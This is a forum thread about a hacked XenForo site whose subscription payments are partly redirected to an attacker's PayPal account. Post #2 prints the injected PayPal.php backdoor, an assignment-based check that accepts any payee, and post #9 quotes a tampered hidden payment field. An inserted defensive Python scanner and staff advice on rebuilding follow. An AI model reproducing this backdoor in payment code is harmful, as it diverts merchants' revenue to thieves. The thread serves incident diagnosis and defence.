
XF 1.5 Hacker keeps stealing money

#1
So around 7 months ago my site was hacked. I changed everything, reinstalled XenForo and got everything set up again. A few months after, I noticed payments from my subscriptions going to another PayPal, "randydrew6@outlook.com", instead of mine, which is "randydrew6@gmail.com", so I contacted my hosting company and got them to fix it. Now I've noticed that this past month I've made less money than I should have, and checking the logs it seems payments still very seldom go to "randydrew6@outlook.com". Most of the time it will go to my PayPal, but 10% of the time payments go to this other PayPal. What can I do to stop this from happening? I've tried contacting PayPal in the past and they have refunded it and banned an older account that this happened on, but when it happened with this Outlook account they told me there is nothing they can do.
 
#2
After digging into my FTP I noticed that under /library/Xenforo/UserUpgradeProcessor/PayPal.php there was:

foreach ($accounts AS $account)
{
    $account = trim(strtolower($account));
    // The two "randydrew6@outlook.com" clauses are the injected part. Note the
    // single "=" on $receiverEmail: it assigns rather than compares, so as long
    // as $account is non-empty this condition is true no matter who received
    // the payment, and the receiver check is effectively bypassed.
    if ($account && ($business == $account || $receiverEmail == $account || $receiverEmail = "randydrew6@outlook.com" || $business == "randydrew6@outlook.com"))
    {
        $matched = true;
        break;
    }
}

Is there any other file he might have edited?
 

Claudio

Well-known member
#3
Which addons are installed on your forum?
Have you changed all passwords after your forum was compromised?
Make sure to add .htaccess password protection to the admin panel
 
#4
I've changed all admin passwords and there are no mods. I've removed super user from everyone but me and also require phone verification to log in to my account. ".htaccess password protection": can you link me to somewhere I can figure out how to do that?
 

Claudio

Well-known member
#5
http://www.htaccesstools.com/articles/password-protection/

If there are no addons installed on your forum I'd suggest the following:
- Make sure you reinstalled the forum by deleting all previous files.
- Are you using the default XenForo style?
If you weren't using a style other than the default one, you never installed addons on your forum, you don't have any other script or platform like WordPress on the same domain (which could have a security issue) and no one else had access to your files, I'd make sure to check whether your hosting company is trustworthy.
 
#9
Hmm. But their addon where you purchase credit is going to the correct email; it's just the account upgrades page. If I inspect the element it shows

<input type="hidden" name="business" value="randydrew6@outlook.com">

but it's the correct value in the page that buys credits. Where exactly would someone go to edit this value in PHP?
 

Mike

XenForo developer
Staff member
#12
If an attacker has gained access to the point where files are edited, absolutely everything must be considered tainted. You can use the file health check to see if there are core files that may have been edited, but this is not conclusive as it doesn't cover custom files and it won't cover things in "user" directories (data and internal_data). It also sounds like he's edited at least one template. Effectively, it sounds like he gained full control.

The ideal approach in this situation is basically a rebuild. This might be viable using a XenForo-to-XenForo import (which means you wouldn't maintain your old files or database, only bringing across what the import brings), but this will cause some data and configuration loss. If you have add-ons, it's likely none of them will be maintained.

If that's not viable, you can try to audit manually to remove any changes made, but this likely won't be trivial.
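As an added illustration of the kind of audit Mike describes (it is not code from this thread or from XenForo), the script below scans a set of files for the two edits the thread shows: a payee address other than the forum owner's expected PayPal account (the hidden "business" input from post #9) and a lone "=" assignment inside an if(...) condition (the PayPal.php backdoor from post #2). It assumes the files have already been read into a path-to-content dict and that the expected payee is the gmail address from post #1; the sample tree is constructed.

```python
# Added example, not code from the thread or from XenForo. It scans files
# (path -> content, constructed inline here) for a payee address other than
# the expected PayPal account (post #9's hidden "business" input) and for a
# lone "=" assignment inside an if(...) condition (post #2's backdoor).
import re

EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
# A single "=" (not ==, ===, !=, <=, >=, =>) followed by a string literal:
# the assignment is always truthy, so the check passes for any account.
ASSIGN_RE = re.compile(r'\$\w+\s*(?<![=!<>])=(?![=>])\s*["\']')
BUSINESS_RE = re.compile(r'name=["\']business["\']\s+value=["\']([^"\']+)["\']')


def scan_file(path, content, expected_payee):
    """Return (path, kind, detail) findings for one PHP or template file."""
    findings = []
    expected = expected_payee.strip().lower()
    for email in sorted(set(EMAIL_RE.findall(content))):
        if email.lower() != expected:
            findings.append((path, "unexpected_email", email))
    for line in content.splitlines():
        if line.lstrip().startswith("if") and ASSIGN_RE.search(line):
            findings.append((path, "assignment_in_condition", line.strip()))
    for m in BUSINESS_RE.finditer(content):
        if m.group(1).strip().lower() != expected:
            findings.append((path, "payee_field_mismatch", m.group(1)))
    return findings


def scan_tree(files, expected_payee):
    """Scan every file; an empty result means nothing suspicious was found."""
    out = []
    for path in sorted(files):
        out.extend(scan_file(path, files[path], expected_payee))
    return out


# Constructed sample tree: the PayPal.php condition mirrors post #2, the
# template line mirrors post #9, and Clean.php is what the check should be.
SAMPLE_FILES = {
    "library/XenForo/UserUpgradeProcessor/PayPal.php":
        'if ($account && ($business == $account || $receiverEmail == $account'
        ' || $receiverEmail = "randydrew6@outlook.com"'
        ' || $business == "randydrew6@outlook.com"))\n{ $matched = true; }\n',
    "templates/account_upgrades.html":
        '<input type="hidden" name="business" value="randydrew6@outlook.com">\n',
    "library/XenForo/Clean.php":
        'if ($business == $account || $receiverEmail == $account)\n',
}
```

Run scan_tree over every PHP file and template export, including data and internal_data, since the file health check does not cover those directories.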
 
#13
Is this what you mean? I've contacted my server staff and they responded with the following:


Hello dear Randy,
Our tech staff has found a PHP file in the framework of your XenForo setup with outlier code, which made transfers to randydrew6@outlook.com.
We corrected the code and prohibited changes to this file. Please follow your payments and tell us promptly whether everything is working!

We advise you to move to a new VPS with a new OS and the newest XenForo version; the data from your forum must be transferred manually (in order not to transfer previous weak points from your VPS). Our tech staff is able to help you with relocation of your VPS.

Preparation of VPS (OS, web software, XenForo + help with manual data transfer): $50

The work that was performed today will not be invoiced!

Please let us know your decision!
 

Brogan

XenForo moderator
Staff member
#14
That's more or less what Mike said.

It's almost impossible to know if there are any backdoors, compromised files, etc. so it's quicker and easier to just start over with a new OS, files, etc.